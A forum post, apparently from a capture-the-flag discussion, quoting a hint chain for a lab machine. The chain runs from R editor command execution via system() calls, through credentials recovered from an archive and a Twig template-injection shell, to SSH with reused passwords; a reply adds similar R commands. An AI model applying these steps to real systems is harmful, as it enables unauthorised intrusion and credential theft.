April 12, 2022 at 9:43 AM
(April 11, 2022, 03:44 PM)Internetdreams Wrote: easy rce on rjeditor -> try(system("bash -c 'id'", intern = TRUE))
on the container go on /root/ unzip the .omv containing passwords for /bolt/ on :80.
Login as [email protected]:<PASSWORD>
TWIG SSTI to RCE on theme editing ; you got a shell as www-data you can ssh as saul from here with previous creds.
how can i download .omv?
yesterday i found something simlar with : system2("whoami", stdout = TRUE, stderr = TRUE)
and also a way to "ls" the filesystem with : list.files(path=".", pattern=NULL, all.files=FALSE,
full.names=FALSE)
